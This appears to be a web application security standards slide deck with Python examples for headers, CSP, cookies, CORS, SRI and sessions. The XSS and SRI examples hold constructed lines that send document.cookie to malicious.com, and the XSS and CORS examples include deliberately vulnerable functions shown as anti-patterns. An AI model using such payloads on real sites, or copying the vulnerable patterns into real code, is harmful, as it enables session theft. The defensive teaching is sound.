WEB APPLICATION SECURITY STANDARDS

It is much more secure to be feared than to be loved.

www.ideas2it.com

Security Headers

● Content-Security-Policy
  ○ Reduces XSS risk on modern browsers by restricting the origins from which scripts, styles and other resources may load
● X-Content-Type-Options
  ○ nosniff prevents browsers from trying to guess ("sniff") the MIME type of a response
● X-XSS-Protection
  ○ Asked browsers to stop loading a page when they detected reflected cross-site scripting (XSS); the filter is deprecated and no longer implemented by current browsers (Chrome and Edge removed it, Firefox never had it), so rely on CSP instead
● X-Frame-Options
  ○ Prevents the site from being framed by other sites (clickjacking attacks); the CSP frame-ancestors directive supersedes it


Security Headers

● Strict-Transport-Security
  ○ Tells browsers that the site must only be accessed over HTTPS; after the first visit the browser upgrades http:// URLs itself and refuses to click through certificate errors
● Referrer-Policy
  ○ Controls how much referrer information (sent via the Referer header) is included with requests; strict-origin-when-cross-origin is a sensible default
● Feature-Policy
  ○ Provides a mechanism to allow and deny the use of browser features (camera, geolocation, ...); it has been renamed Permissions-Policy, which is the header current browsers implement
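The following is an added example, not code from the slides: a small checker that takes a response's headers as a dict and reports which of the headers listed above are missing or weak, plus the Server/X-Powered-By disclosure headers. The two sample responses are constructed, not captured from a real server.

```python
"""Audit the security headers of an HTTP response.

Added example (not from the original slides): a checker for the headers
listed above, working on a plain dict of response headers, so it runs with no
network. The two sample responses at the bottom are constructed, not captured.
"""
from typing import Dict, List

# Referrer-Policy values that never send path or query to another origin.
STRICT_REFERRER_POLICIES = {
    "no-referrer", "same-origin", "strict-origin", "strict-origin-when-cross-origin",
}
ONE_YEAR = 31536000  # seconds; the customary minimum for HSTS max-age


def hsts_max_age(value: str) -> int:
    """Return max-age from a Strict-Transport-Security value (0 if absent or malformed)."""
    for part in value.split(";"):
        name, _, number = part.strip().partition("=")
        if name.strip().lower() == "max-age" and number.strip().isdigit():
            return int(number)
    return 0


def audit_security_headers(headers: Dict[str, str]) -> List[str]:
    """Return a list of findings; an empty list means every check passed."""
    h = {k.lower(): v.strip() for k, v in headers.items()}  # header names are case-insensitive
    findings: List[str] = []

    csp = h.get("content-security-policy", "").lower()
    if not csp:
        findings.append("Content-Security-Policy missing")
    elif "'unsafe-inline'" in csp and "nonce-" not in csp and "sha256-" not in csp:
        findings.append("Content-Security-Policy allows 'unsafe-inline' without nonces or hashes")

    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options should be 'nosniff'")

    frame_ok = h.get("x-frame-options", "").upper() in ("DENY", "SAMEORIGIN")
    if not frame_ok and "frame-ancestors" not in csp:
        findings.append("No clickjacking protection (X-Frame-Options or CSP frame-ancestors)")

    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("Strict-Transport-Security missing")
    else:
        if hsts_max_age(hsts) < ONE_YEAR:
            findings.append("Strict-Transport-Security max-age is below one year")
        if "includesubdomains" not in hsts.lower():
            findings.append("Strict-Transport-Security lacks includeSubDomains")

    if h.get("referrer-policy", "").lower() not in STRICT_REFERRER_POLICIES:
        findings.append("Referrer-Policy missing or leaks full URLs cross-origin")

    if "permissions-policy" not in h and "feature-policy" not in h:
        findings.append("Permissions-Policy missing (Feature-Policy is its older name)")

    # Information disclosure: a version number in Server, or any X-Powered-By at all.
    server = h.get("server", "")
    if any(ch.isdigit() for ch in server):
        findings.append(f"Server header discloses a version: {server!r}")
    if "x-powered-by" in h:
        findings.append("X-Powered-By discloses the platform; remove it")
    return findings


# Constructed sample responses (not captured from a real server).
WEAK_RESPONSE = {
    "Server": "Apache/2.4.41 (Ubuntu)",
    "X-Powered-By": "PHP/7.4.3",
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=300",
}
HARDENED_RESPONSE = {
    "Server": "webserver",
    "Content-Type": "text/html; charset=utf-8",
    "Content-Security-Policy": ("default-src 'self'; script-src 'self' 'nonce-r4nd0m'; "
                                "object-src 'none'; frame-ancestors 'none'"),
    "X-Content-Type-Options": "nosniff",
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload",
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Permissions-Policy": "geolocation=(), camera=(), microphone=()",
}

if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_security_headers(response) or ["OK"])
```

Run it against a real response by feeding `dict(resp.headers)` from whatever HTTP client you use; the checker deliberately does not flag a missing X-XSS-Protection, since current browsers ignore that header.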


Content Security Policy (diagram)

Response header: Content-Security-Policy: default-src digicontent.com

Allowed by the policy: digicontent.com/assets/css/styles.css, digicontent.com/assets/js/filter.js

Blocked by the policy: malicious.com/assets/js/xss.js (the browser refuses to load resources from any origin the policy does not list, so an injected script tag pointing at an attacker's host never executes)
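As an added example (not code from the slides), the following reproduces the browser's decision in the diagram above: it parses a CSP header and matches a resource URL against the governing directive's source expressions. It implements 'none', 'self', '*', scheme sources and host sources with wildcard subdomain, port and path; nonces, hashes and 'strict-dynamic' are out of scope. The policies and URLs in the usage are constructed.

```python
"""Decide whether a Content-Security-Policy lets a page load a resource.

Added example (not from the original slides): a simplified version of the
browser's source matching, enough to reproduce the diagram above and the
common host-source cases ('self', 'none', scheme, exact host, *.wildcard,
port and path). Nonces, hashes and 'strict-dynamic' are out of scope.
"""
from typing import Dict, List
from urllib.parse import SplitResult, urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def parse_csp(value: str) -> Dict[str, List[str]]:
    """'default-src a; script-src b c' -> {'default-src': ['a'], 'script-src': ['b', 'c']}."""
    policy: Dict[str, List[str]] = {}
    for directive in value.split(";"):
        tokens = directive.strip().split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def _effective_port(url: SplitResult) -> int:
    return url.port if url.port is not None else DEFAULT_PORTS.get(url.scheme, 0)


def _source_matches(source: str, resource: SplitResult, page: SplitResult) -> bool:
    """Match one source expression against the resource URL (host-source rules)."""
    if source == "'none'":
        return False
    if source == "*":
        return resource.scheme in ("http", "https")  # '*' never covers data: or blob:
    if source == "'self'":
        return (resource.scheme, resource.hostname, _effective_port(resource)) == \
               (page.scheme, page.hostname, _effective_port(page))
    if source.endswith(":") and "/" not in source:          # scheme-source, e.g. https:
        return resource.scheme == source[:-1].lower()
    src = urlsplit(source if "://" in source else "//" + source)
    if src.scheme:
        if src.scheme.lower() != resource.scheme:
            return False
    elif not (resource.scheme == page.scheme or
              (page.scheme == "http" and resource.scheme == "https")):
        return False                                         # no scheme given: page's scheme, or its https upgrade
    host = (src.hostname or "").lower()
    target = (resource.hostname or "").lower()
    if host.startswith("*."):
        if not target.endswith(host[1:]):                    # *.cdn.example does not cover cdn.example itself
            return False
    elif target != host:
        return False
    if src.port is not None and _effective_port(resource) != src.port:
        return False
    if src.port is None and resource.port is not None and \
            resource.port != DEFAULT_PORTS.get(resource.scheme):
        return False
    if src.path:                                             # directory prefix if it ends in '/', else exact file
        return resource.path.startswith(src.path) if src.path.endswith("/") else resource.path == src.path
    return True


def csp_allows(policy_header: str, directive: str, resource_url: str, page_url: str) -> bool:
    """True if the policy permits the fetch; fetch directives fall back to default-src."""
    policy = parse_csp(policy_header)
    sources = policy.get(directive, policy.get("default-src"))
    if sources is None:
        return True                  # no governing directive, so CSP does not restrict this fetch
    resource, page = urlsplit(resource_url), urlsplit(page_url)
    return any(_source_matches(src, resource, page) for src in sources)   # empty list == 'none'


if __name__ == "__main__":
    POLICY, PAGE = "default-src digicontent.com", "https://digicontent.com/"   # the slide's policy
    for directive, url in (("style-src", "https://digicontent.com/assets/css/styles.css"),
                           ("script-src", "https://digicontent.com/assets/js/filter.js"),
                           ("script-src", "https://malicious.com/assets/js/xss.js")):
        print(url, "->", "allowed" if csp_allows(POLICY, directive, url, PAGE) else "blocked")
```

Note the fallback: `style-src` is not in the slide's policy, so the style sheet is judged by `default-src`; a directive that is present but empty (`script-src;`) behaves like 'none'.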

MIME Sniffing (diagram)

Without X-Content-Type-Options: nosniff the browser inspects the bytes of an asset to determine its MIME type; content that looks like HTML is treated as HTML, so a file served as text/plain or a user-uploaded "image" can end up executing script. With nosniff the declared Content-Type is authoritative.

HTTP Strict Transport Security (diagram)

Client with HSTS enabled for digicontent.com: a request typed as http://digicontent.com is rewritten to https://digicontent.com before it leaves the browser, so no plaintext request reaches the origin server. On the very first visit the server still has to redirect to HTTPS and send the Strict-Transport-Security header (or the domain must be on the browser preload list).

Cross Site Scripting - XSS

● Stealing other users' cookies (when the session cookie lacks HttpOnly)
● Stealing their private information
● Performing actions on behalf of other users
● Redirecting to other websites
● Showing ads in hidden IFRAMEs and pop-ups
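The following is an added example, not code from the slides: a reflected-XSS sink (user input concatenated into HTML) beside the context-aware encodings that neutralise it. The payload and the rendering functions are constructed for illustration.

```python
"""Reflected XSS: the vulnerable template beside its encoded counterparts.

Added example (not from the original slides). Each output context needs its own
encoder: HTML text/attributes, URLs in href, and data embedded in inline script.
"""
import html
import json
from urllib.parse import urlsplit

ALLOWED_URL_SCHEMES = ("http", "https")


def render_search_vulnerable(query: str) -> str:
    """Untrusted input dropped straight into HTML: the classic reflected XSS sink."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """HTML-text context: escape <, >, &, and (quote=True) both quote characters."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def safe_href(url: str) -> str:
    """URL-attribute context: escaping alone does not stop javascript: links, so allowlist the scheme."""
    if urlsplit(url).scheme.lower() not in ALLOWED_URL_SCHEMES:
        return "#"
    return html.escape(url, quote=True)


def embed_in_script_safe(data: dict) -> str:
    """Inline-script context: JSON-encode and escape '<' so '</script>' cannot close the block."""
    payload = json.dumps(data).replace("<", "\\u003c")
    return f"<script>const config = {payload};</script>"


# Constructed payload: exfiltrates document.cookie, which is why HttpOnly matters too.
PAYLOAD = '<script>location="https://malicious.com/?c="+document.cookie</script>'

if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
    print(safe_href("javascript:alert(1)"), safe_href("https://digicontent.com/?a=1&b=2"))
    print(embed_in_script_safe({"q": "</script><script>alert(1)</script>"}))
```

The point of the third and fourth functions is that `html.escape` is only right for the HTML text and attribute contexts; a template engine with context-aware auto-escaping applies the same distinctions for you.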


Secure cache control settings

● max-age: seconds the response may be served from a cache without revalidation
● no-cache: may be stored, but must be revalidated with the origin before each reuse
● no-store: must not be written to any cache; use it for responses that carry personal data or session tokens
● public: may be stored by shared caches (CDNs, proxies) even when the request was authenticated
● private: only the user's own browser cache may store it
● must-revalidate: once stale, never serve it without a successful revalidation
● proxy-revalidate: the same rule, applied to shared caches only

Cache-Control (diagram)

Request: digicontent.com/styles.css

Response: Cache-Control: max-age=3600

The browser receives styles.css, stores it in its cache and serves it locally for 3600 s before asking the server again. The same header on a page that shows one user's data would let a shared cache hand that page to the next user, which is why such responses need no-store.

Cookie attributes

● HttpOnly: not readable from JavaScript, so XSS cannot exfiltrate it
● Secure: sent only over HTTPS
● Domain: omit it to scope the cookie to the exact host; setting it shares the cookie with every subdomain
● SameSite (Strict/Lax/None): whether the browser attaches the cookie to cross-site requests; None requires Secure
● Path: limits which URL paths receive the cookie (not a security boundary within one origin)
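The following is an added example, not code from the slides: one function issues a session cookie with every attribute above set defensively (using the `__Host-` prefix, which browsers only accept with Secure, Path=/ and no Domain), and a second audits an arbitrary Set-Cookie value. Cookie names and values are constructed.

```python
"""Build a hardened session Set-Cookie header and audit one you were given.

Added example (not from the original slides). Cookie names and values are
constructed; the server issuing them is assumed to run over HTTPS, which the
Secure attribute and the __Host- prefix require.
"""
from http.cookies import SimpleCookie
from typing import Dict, List, Optional


def session_set_cookie(name: str, value: str, same_site: str = "Lax",
                       max_age: Optional[int] = None) -> str:
    """Set-Cookie value with every attribute from the list above set defensively."""
    if same_site not in ("Strict", "Lax", "None"):
        raise ValueError("SameSite must be Strict, Lax or None")
    jar = SimpleCookie()
    jar[name] = value
    morsel = jar[name]
    morsel["path"] = "/"             # whole site; Path is not an isolation boundary anyway
    morsel["httponly"] = True        # script cannot read it, so XSS cannot exfiltrate it
    morsel["secure"] = True          # HTTPS only; also mandatory for SameSite=None
    morsel["samesite"] = same_site   # Lax/Strict keep it off cross-site requests (CSRF)
    if max_age is not None:          # omit it for a session cookie dropped when the browser closes
        morsel["max-age"] = max_age
    # No Domain attribute: the cookie stays scoped to the exact host that set it.
    return morsel.OutputString()


def audit_set_cookie(header_value: str) -> List[str]:
    """Findings for one Set-Cookie header value; an empty list means it passed."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    findings: List[str] = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by injected script")
    if "secure" not in attrs:
        findings.append("missing Secure: may be sent over plaintext HTTP")
    if attrs.get("samesite", "").lower() not in ("strict", "lax"):
        findings.append("SameSite not Strict/Lax: cookie rides along on cross-site requests")
    if "domain" in attrs:
        findings.append(f"Domain={attrs['domain']} shares the cookie with every subdomain")
    if name.startswith("__Host-") and (
            "domain" in attrs or attrs.get("path") != "/" or "secure" not in attrs):
        findings.append("__Host- prefix requires Secure, Path=/ and no Domain")
    return findings


if __name__ == "__main__":
    hardened = session_set_cookie("__Host-session", "k2F9xQ", same_site="Strict", max_age=1200)
    print(hardened)
    print(audit_set_cookie(hardened) or ["OK"])
    print(audit_set_cookie("session=k2F9xQ; Domain=digicontent.com; Path=/"))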

Cookie SameSite (diagram): the vulnerable case is a cross-site request to which the browser attaches the session cookie; SameSite=Lax or Strict stops that, which is the CSRF defence the attribute exists for.

TLS

SSL vs. TLS

● SSL and TLS are both cryptographic protocols that provide authentication and data encryption between servers, machines and applications; TLS is the successor to SSL and the only one of the two that should still be in use.

SSL versions:

● SSL 1.0 (never publicly released)
● SSL 2.0 (prohibited, RFC 6176)
● SSL 3.0 (deprecated, RFC 7568; broken by POODLE)

TLS versions:

● TLS 1.0 (deprecated, RFC 8996)
● TLS 1.1 (deprecated, RFC 8996)
● TLS 1.2 (acceptable with modern cipher suites)
● TLS 1.3 (preferred)

Recommended HTTP Methods

● GET and POST

Dilemma of using other HTTP methods

● PUT and DELETE: verb tampering, when access controls are written for GET and POST only and another verb reaches the same handler unauthenticated
● OPTIONS: exposes the other HTTP methods the server supports; note that browsers need it for CORS preflight, so restrict it to what the API uses rather than blocking it blindly
● TRACE and TRACK: enable cross-site tracing (XST), which echoes the full request, including cookies, back to the caller; disable them on the server


Server Information Disclosure

● Server name
● Server version
● Remove or genericise the Server and X-Powered-By headers and keep version strings out of error pages; they let an attacker pick exploits for the exact build

CORS Enablement

● Access-Control-Allow-Origin: return one exact origin from an allowlist, never a wildcard together with credentials and never the reflected value of the request's Origin header
● Not advisable to use cross-domain access; use it only if really needed, and send Vary: Origin so caches do not serve one origin's response to another
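The following is an added example, not code from the slides: the common CORS mistake (echoing the request's Origin with credentials allowed) beside an exact-match allowlist. The allowlisted origins are constructed; in a real service they come from configuration, never from the request.

```python
"""CORS: reflecting the Origin header beside an exact-match allowlist.

Added example (not from the original slides). The allowlisted origins are
constructed; in a real service they come from configuration.
"""
from typing import Dict, FrozenSet, Optional

ALLOWED_ORIGINS: FrozenSet[str] = frozenset({
    "https://app.digicontent.com",
    "https://admin.digicontent.com",
})


def cors_headers_vulnerable(request_origin: Optional[str]) -> Dict[str, str]:
    """The anti-pattern: echo whatever Origin the browser sent, with credentials on.

    Any site can now read authenticated responses from this API in the victim's browser.
    """
    if request_origin is None:
        return {}
    return {"Access-Control-Allow-Origin": request_origin,
            "Access-Control-Allow-Credentials": "true"}


def cors_headers(request_origin: Optional[str],
                 allowed: FrozenSet[str] = ALLOWED_ORIGINS) -> Dict[str, str]:
    """Exact, case-sensitive allowlist match; anything else gets no CORS headers at all."""
    if request_origin is None or request_origin not in allowed:
        return {}   # the browser then blocks the cross-origin read (same-origin policy)
    return {
        "Access-Control-Allow-Origin": request_origin,   # one origin, never '*' with credentials
        "Access-Control-Allow-Credentials": "true",
        "Access-Control-Allow-Methods": "GET, POST",
        "Access-Control-Allow-Headers": "Authorization, Content-Type",
        "Access-Control-Max-Age": "600",
        "Vary": "Origin",   # caches must key on Origin or one origin's answer leaks to another
    }


if __name__ == "__main__":
    for origin in ("https://app.digicontent.com", "https://malicious.com",
                   "https://app.digicontent.com.malicious.com", "http://app.digicontent.com", "null"):
        print(f"{origin:48} allowlist: {cors_headers(origin).get('Access-Control-Allow-Origin', 'denied'):32}"
              f" reflected: {cors_headers_vulnerable(origin)['Access-Control-Allow-Origin']}")
```

Exact matching is the whole point: prefix, suffix and regex checks are what let `https://app.digicontent.com.malicious.com` or the `null` origin through.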


Implement robots.txt

● User-agent: *
● Disallow: /
● robots.txt is advice to well-behaved crawlers, not access control: do not list sensitive paths in it, and protect them with authentication instead

Implement Subresource Integrity Support

● Generate an SRI hash value for every third-party script and stylesheet and put it in the integrity attribute of the <script> or <link> tag; the browser refuses the resource if the CDN copy no longer matches the reviewed bytes

Eg.
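As an added example (not code from the slides), the following generates an `integrity` value for a script, emits the pinned tag, and performs the same check the browser does when the fetched bytes differ. The script bytes are a constructed stand-in for a CDN-hosted file and the CDN URL is a placeholder.

```python
"""Generate and verify Subresource Integrity values.

Added example (not from the original slides). The script bytes are constructed
stand-ins for a file served from a third-party CDN; the CDN URL is a placeholder.
"""
import base64
import hashlib

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """'sha384-<base64 digest>' as used in the integrity attribute."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError("SRI permits only sha256, sha384 and sha512")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """<script> tag pinned to the exact bytes reviewed at build time."""
    # crossorigin="anonymous" is required for cross-origin scripts; without it the
    # browser cannot read the response to check the hash and refuses to run it.
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            f'crossorigin="anonymous"></script>')


def sri_matches(content: bytes, integrity: str) -> bool:
    """What the browser does: the fetch passes if any listed hash matches the bytes."""
    for token in integrity.split():
        algorithm = token.partition("-")[0]
        if algorithm in SRI_ALGORITHMS and sri_hash(content, algorithm) == token:
            return True
    return False


# Constructed sample: the reviewed script and a tampered CDN copy.
ORIGINAL = b"window.filter = function (items) { return items.filter(Boolean); };\n"
TAMPERED = ORIGINAL + b"fetch('https://malicious.com/?c=' + document.cookie);\n"

if __name__ == "__main__":
    print(script_tag("https://cdn.example/assets/js/filter.js", ORIGINAL))
    print("tampered copy accepted:", sri_matches(TAMPERED, sri_hash(ORIGINAL)))
```

Regenerate the value whenever you deliberately upgrade the dependency; a mismatch after a silent CDN change is exactly the failure SRI exists to catch.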


Maven DB Credentials - Encryption

● Database and repository credentials must not appear in plaintext in committed files; the pom.xml is committed, so they do not belong there in any form
● Maven can store server passwords encrypted in ~/.m2/settings.xml, protected by a master password kept in ~/.m2/settings-security.xml (mvn --encrypt-master-password, then mvn --encrypt-password); guidelines below
● The master password sits on the same disk, so this protects against casual disclosure, not against an attacker who can read the user's home directory

https://maven.apache.org/guides/mini/guide-encryption.html


API Authentication

● Implement token-based authentication such as OAuth2 bearer tokens (OAuth2 is an authorization framework; use OpenID Connect on top of it when the user's identity must be authenticated)

API Role Based Authorization

● Implement role-based authorization for each API, denying by default

API Authentication and Authorization Flow (diagram)

Client → OAuth filter → Authorization filter → Server

● The client sends the request along with its token
● The OAuth filter validates the token; an invalid or expired token fails here (401) and never reaches the handler
● A valid token is handed to the authorization filter, which checks the user's role against the API; an invalid user role fails here (403)
● An authorized request reaches the server, which sends the response back to the client
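The following is an added example, not code from the slides: the two filters from the flow above as plain functions, run in order. `TOKEN_STORE` is a constructed stand-in for what an OAuth2 authorization server's token introspection or JWT signature verification would return, and `ROUTE_ROLES` is a constructed route table; both are assumptions for illustration.

```python
"""Bearer-token authentication followed by role-based authorization.

Added example (not from the original slides): the two filters from the flow
above as plain functions. TOKEN_STORE stands in for OAuth2 token introspection
or JWT verification; ROUTE_ROLES is a constructed route table.
"""
import hmac
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Set, Tuple


@dataclass
class Principal:
    subject: str
    roles: Set[str]
    expires_at: float


_NOW = time.time()
TOKEN_STORE: Dict[str, Principal] = {            # constructed; real tokens are opaque or signed
    "tok-admin-1": Principal("alice", {"admin", "user"}, _NOW + 600),
    "tok-user-2": Principal("bob", {"user"}, _NOW + 600),
    "tok-expired": Principal("carol", {"user"}, _NOW - 1),
}

# Deny by default: a route absent from this table is not reachable with any role.
ROUTE_ROLES: Dict[Tuple[str, str], Set[str]] = {
    ("GET", "/api/orders"): {"user", "admin"},
    ("DELETE", "/api/users"): {"admin"},
}


def oauth_filter(auth_header: Optional[str],
                 now: Callable[[], float] = time.time) -> Optional[Principal]:
    """Authentication: resolve the bearer token, or None (the caller answers 401)."""
    if not auth_header or not auth_header.startswith("Bearer "):
        return None
    token = auth_header[len("Bearer "):].strip()
    if not token.isascii():
        return None
    for stored, principal in TOKEN_STORE.items():
        if hmac.compare_digest(stored, token):   # constant-time; no early exit on a partial match
            return principal if principal.expires_at > now() else None
    return None


def authorization_filter(principal: Principal, method: str, path: str) -> bool:
    """Authorization: does one of the caller's roles unlock this method and path?"""
    required = ROUTE_ROLES.get((method, path))
    return bool(required) and bool(principal.roles & required)


def handle(method: str, path: str, headers: Dict[str, str]) -> int:
    """Run both filters in order and return the HTTP status the client would see."""
    principal = oauth_filter(headers.get("Authorization"))
    if principal is None:
        return 401                                   # invalid token fails at the OAuth filter
    if not authorization_filter(principal, method, path):
        return 403                                   # invalid user role fails at the authorization filter
    return 200                                       # the server handles the request


if __name__ == "__main__":
    for method, path, header in (("DELETE", "/api/users", "Bearer tok-admin-1"),
                                 ("DELETE", "/api/users", "Bearer tok-user-2"),
                                 ("GET", "/api/orders", "Bearer tok-expired"),
                                 ("GET", "/api/orders", "Bearer nope")):
        print(method, path, header, "->", handle(method, path, {"Authorization": header}))
```

Authentication and authorization stay separate on purpose: the first filter only answers "who is this", the second only "may they do this", so a missing route mapping fails closed instead of falling through to the handler.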


Password policy configuration

● Reject character repetition (e.g., AAAAAbl$%)
● Reject keyboard patterns, horizontal and vertical (e.g., QWERTY, QAZ)
● Reject dictionary words, including the company and product names (e.g., Ideas)
● Maintain password history (last 24 passwords) so none of them can be reused
● Enforce a change of password every 75 days (30 days for admin accounts)
● Account lockout (or progressive delays) after repeated failed attempts
● Current guidance (NIST SP 800-63B) drops forced periodic rotation and composition rules in favour of length, a breached-password check and MFA; apply the rules above where a compliance regime still demands them
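As an added example (not code from the slides), the following implements the repetition, keyboard-pattern, dictionary and history rules above as a checker. The keyboard rows and the dictionary are constructed and deliberately tiny (a real deployment loads a wordlist and breached-password list); history entries are stored as salted PBKDF2 hashes, never as plaintext.

```python
"""Password policy checks: repetition, keyboard patterns, dictionary words, history.

Added example (not from the original slides). KEYBOARD_ROWS/COLUMNS and DICTIONARY
are constructed, minimal inputs; a real deployment uses a full wordlist. History
is kept as salted slow hashes so the history table is not a plaintext password list.
"""
import hashlib
import hmac
import os
from typing import List, Optional, Set, Tuple

KEYBOARD_ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm", "1234567890"]
KEYBOARD_COLUMNS = ["qaz", "wsx", "edc", "rfv", "tgb", "yhn", "ujm"]     # vertical runs
DICTIONARY = {"ideas", "password", "welcome", "digicontent"}            # constructed
HISTORY_DEPTH = 24
PBKDF2_ROUNDS = 100_000


def _runs(sequence: str, length: int) -> Set[str]:
    """Every contiguous substring of the given length."""
    return {sequence[i:i + length] for i in range(len(sequence) - length + 1)}


# Three-key runs in either direction along a row or down a column (qwe, ewq, qaz, zaq, ...).
KEYBOARD_PATTERNS: Set[str] = set()
for _keys in KEYBOARD_ROWS + KEYBOARD_COLUMNS:
    KEYBOARD_PATTERNS |= _runs(_keys, 3) | _runs(_keys[::-1], 3)


def hash_for_history(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted slow hash for the history table; returns (salt, digest)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def check_password(password: str, history: List[Tuple[bytes, bytes]]) -> List[str]:
    """Return the policy violations for a candidate password (empty list = accepted)."""
    violations: List[str] = []
    lowered = password.lower()
    if any(lowered[i] == lowered[i + 1] == lowered[i + 2] for i in range(len(lowered) - 2)):
        violations.append("repeats the same character three or more times")
    if any(pattern in lowered for pattern in KEYBOARD_PATTERNS):
        violations.append("contains a keyboard pattern")
    if any(word in lowered for word in DICTIONARY):
        violations.append("contains a dictionary word")
    for salt, digest in history[-HISTORY_DEPTH:]:          # only the last 24 entries count
        if hmac.compare_digest(hash_for_history(password, salt)[1], digest):
            violations.append("reuses one of the last 24 passwords")
            break
    return violations


if __name__ == "__main__":
    previous = [hash_for_history("Tr0ub4dor&3")]           # constructed history entry
    for candidate in ("AAAAAbl$%", "QWERTY!9x", "myQAZpass", "Ideas2024!",
                      "Tr0ub4dor&3", "correct horse battery staple"):
        print(f"{candidate!r}: {check_password(candidate, previous) or 'accepted'}")
```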


Session management

● Issue a new, unique session identifier for each login; never keep the identifier from before authentication (session fixation)
● Terminate the session on logout, server-side as well as by clearing the cookie; omit Max-Age and Expires so the browser drops the cookie when it closes

Application Inactivity timeout

● Terminate the session after 20 minutes of inactivity
● Refresh the auth token every 10 minutes
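The following is an added example, not code from the slides: a server-side session store that issues a fresh random identifier per login, drops sessions after 20 minutes of inactivity, rotates the auth token every 10 minutes and invalidates on logout. The clock is injected so the timeouts can be exercised without waiting; the 20 and 10 minute constants are the values from the slide.

```python
"""Server-side session store with per-login IDs, idle timeout and token refresh.

Added example (not from the original slides). The clock is injected so the
20-minute idle timeout and 10-minute token refresh can be tested without waiting.
"""
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 20 * 60        # seconds of inactivity before the session is dropped
TOKEN_REFRESH = 10 * 60       # rotate the auth token this often


@dataclass
class Session:
    user: str
    last_seen: float
    auth_token: str
    token_issued: float


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time):
        self._clock = clock
        self._sessions: Dict[str, Session] = {}

    def login(self, user: str) -> str:
        """Fresh 256-bit random ID per login; a pre-login ID is never promoted (fixation)."""
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = Session(user, now, secrets.token_urlsafe(32), now)
        return sid

    def touch(self, sid: str) -> Optional[Session]:
        """Validate a request's session; None means the caller must re-authenticate."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        if now - session.last_seen > IDLE_TIMEOUT:
            del self._sessions[sid]                  # expired: remove so the ID cannot be revived
            return None
        session.last_seen = now
        if now - session.token_issued >= TOKEN_REFRESH:
            session.auth_token = secrets.token_urlsafe(32)
            session.token_issued = now
        return session

    def logout(self, sid: str) -> None:
        """Server-side termination; clearing the cookie alone leaves the ID valid."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    sid = store.login("alice")
    print("session id:", sid)
    print("valid:", store.touch(sid) is not None)
    store.logout(sid)
    print("valid after logout:", store.touch(sid) is not None)
```

Pair the server side with a cookie that has no Max-Age or Expires so the browser also discards the identifier when it closes; the server cannot observe a browser closing, so the idle timeout is what bounds an abandoned session.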

Custom Error Page

Generate custom error pages for 4xx and 5xx responses so that stack traces, framework names and server versions are not exposed; log the details server-side instead.

Exposing Hidden Directories/Files

Do not expose hidden directories/files from the server (such as .htaccess, .git, .svn, .env); an exposed .git directory lets an attacker download the whole source tree, configuration and history.

Directory Listing

Do not enable the Indexes option inside a <Directory> block (Apache: Options -Indexes); listing a directory exposes the project structure and any file you forgot to protect.


Best Practices of a secured Application

● Use a standard authentication protocol such as OAuth2 with OpenID Connect
● Do not transport confidential information in URL parameters (they end up in logs, browser history and the Referer header)
● Disable password autocomplete (note that current browsers ignore autocomplete="off" on password fields, so do not rely on it)
● Should not be vulnerable to SQL injection: use prepared statements or query parameters, never string concatenation
● Errors should be handled properly, without leaking internals to the client
● Inputs should be properly validated against an allowlist of expected values
● File uploads should be limited to an allowlist of extensions and content types (never .bat, .exe, .sh, etc.), stored outside the web root and renamed on the server
● Enable audit logs and rate limits
● Encrypt data at rest with an authenticated symmetric cipher (AES-256-GCM); RSA-4096 is for wrapping keys or signing, not for bulk data
● Proper permission settings on the server (least privilege for the service account and the file system)
